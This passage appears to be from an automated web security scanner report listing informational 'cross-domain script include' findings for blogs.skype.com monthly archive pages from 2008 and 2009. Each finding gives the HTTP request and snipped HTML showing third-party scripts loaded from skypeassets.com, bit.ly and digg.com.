...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.42. http://blogs.skype.com/en/2008/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/03/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:10 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 126075
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.43. http://blogs.skype.com/en/2008/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/04/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 216000
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.44. http://blogs.skype.com/en/2008/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 87142
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.45. http://blogs.skype.com/en/2008/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:06 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 351318
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.46. http://blogs.skype.com/en/2008/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 138815
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<span style="float:left;margin-right:12px;margin-bottom:12px;"><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...

18.47. http://blogs.skype.com/en/2008/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 364699
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.48. http://blogs.skype.com/en/2008/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 132877
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.49. http://blogs.skype.com/en/2008/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/10/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 248998
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.50. http://blogs.skype.com/en/2008/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/11/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 135760
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.51. http://blogs.skype.com/en/2008/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/12/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:59 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 161922
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.52. http://blogs.skype.com/en/2009/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/01/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 105287
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.53. http://blogs.skype.com/en/2009/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/02/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 308499
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.54. http://blogs.skype.com/en/2009/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/03/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:55 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 527797
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.55. http://blogs.skype.com/en/2009/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/04/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:53 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 87373
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.56. http://blogs.skype.com/en/2009/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2009/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:52 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 111632
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
